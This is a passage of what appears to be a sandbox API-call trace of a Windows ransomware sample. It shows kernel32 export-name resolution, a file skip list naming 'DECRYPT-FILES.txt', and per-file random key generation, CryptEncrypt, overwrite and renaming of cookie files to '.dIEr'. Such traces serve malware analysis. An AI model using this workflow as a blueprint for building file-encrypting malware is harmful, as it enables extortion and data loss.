| out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0079.609] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0079.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0079.609] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0079.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0079.609] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0079.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0079.609] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0079.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0079.609] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0079.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0079.609] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0079.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0079.609] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0079.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0079.609] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0079.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0079.609] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0079.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0079.609] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0079.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0079.610] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0079.610] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0079.610] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0079.610] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0079.610] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0079.610] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0079.610] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0079.610] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0079.610] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0079.610] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0079.610] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0079.610] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0079.610] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0079.610] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0079.610] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0079.610] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt") returned 111 [0079.610] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt.dIEr") returned 116 [0079.610] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt.dIEr" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt.dier"), dwFlags=0x0) returned 1 [0079.611] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.611] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.611] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.611] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf54e030, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf54e030, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf54e030, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0xb2, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@track.adform[2].txt", cAlternateFileName="5PD4D3~1.TXT")) returned 1 [0079.612] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@track.adform[2].txt", lpString2="DECRYPT-FILES.txt") returned -1 [0079.612] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@track.adform[2].txt", lpString2="autorun.inf") returned -1 [0079.612] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@track.adform[2].txt", lpString2="boot.ini") returned -1 [0079.612] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@track.adform[2].txt", lpString2="desktop.ini") returned -1 [0079.612] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@track.adform[2].txt", lpString2="ntuser.dat") returned -1 [0079.612] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@track.adform[2].txt", lpString2="iconcache.db") returned -1 [0079.612] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@track.adform[2].txt", lpString2="bootsect.bak") returned -1 [0079.612] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@track.adform[2].txt", lpString2="ntuser.dat.log") returned -1 [0079.612] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@track.adform[2].txt", lpString2="thumbs.db") returned -1 [0079.612] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@track.adform[2].txt", lpString2="Bootfont.bin") returned -1 [0079.612] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@track.adform[2].txt") returned 40 [0079.612] lstrcmpiW (lpString1="txt", lpString2="lnk") returned 1 [0079.612] lstrcmpiW (lpString1="txt", lpString2="exe") returned 1 [0079.612] lstrcmpiW (lpString1="txt", lpString2="sys") returned 1 [0079.612] lstrcmpiW (lpString1="txt", lpString2="dll") returned 1 [0079.612] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0079.612] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@track.adform[2].txt") returned 40 [0079.612] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0079.612] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@track.adform[2].txt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt" [0079.612] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.613] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0079.613] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=178) returned 1 [0079.613] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0079.614] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0079.614] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0079.614] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0079.614] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.615] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0079.615] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0079.616] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.616] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0079.616] CloseHandle (hObject=0x464) returned 1 [0079.616] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.617] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0079.617] CloseHandle (hObject=0x0) returned 0 [0079.617] CloseHandle (hObject=0x460) returned 1 [0079.618] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.618] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.618] GetTickCount () returned 0x114c64c [0079.619] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.619] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0079.619] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0079.619] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.620] lstrlenA (lpString="kernel32.dll") returned 12 [0079.620] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0079.620] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0079.620] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0079.620] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0079.620] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0079.620] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0079.620] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0079.620] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0079.620] lstrlenA (lpString="ADDATOMA") returned 8 [0079.620] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0079.620] lstrlenA (lpString="ADDATOMW") returned 8 [0079.620] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0079.620] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0079.620] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0079.620] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0079.620] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0079.620] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0079.620] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0079.620] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0079.620] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0079.620] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0079.620] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0079.621] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0079.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0079.621] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0079.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0079.621] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0079.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0079.621] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0079.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0079.621] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0079.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0079.621] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0079.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0079.621] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0079.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0079.621] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0079.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0079.621] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0079.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0079.621] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0079.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0079.621] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0079.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0079.621] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0079.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0079.621] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0079.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0079.621] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0079.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0079.621] lstrlenA (lpString="BACKUPREAD") returned 10 [0079.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0079.621] lstrlenA (lpString="BACKUPSEEK") returned 10 [0079.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0079.621] lstrlenA (lpString="BACKUPWRITE") returned 11 [0079.622] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0079.622] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0079.622] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0079.622] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0079.622] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0079.622] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0079.622] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0079.622] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0079.622] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0079.622] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0079.622] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0079.622] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0079.622] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0079.622] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0079.622] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0079.622] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0079.622] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0079.622] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0079.622] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0079.622] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0079.622] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0079.622] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0079.622] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0079.622] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0079.622] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0079.622] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0079.622] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0079.622] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0079.622] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0079.622] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0079.622] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0079.622] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0079.622] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0079.622] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0079.622] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0079.622] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0079.622] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0079.623] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0079.623] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0079.623] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0079.623] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0079.623] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0079.623] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0079.623] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0079.623] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0079.623] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0079.623] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0079.623] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0079.623] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0079.623] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0079.623] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0079.623] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0079.623] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0079.623] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0079.623] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0079.623] lstrlenA (lpString="BEEP") returned 4 [0079.623] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0079.623] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0079.623] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0079.623] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0079.623] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0079.623] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0079.623] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0079.623] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0079.623] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0079.623] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0079.623] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0079.623] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0079.623] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0079.623] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0079.623] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0079.623] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0079.623] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0079.623] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0079.624] lstrcpyA (in: 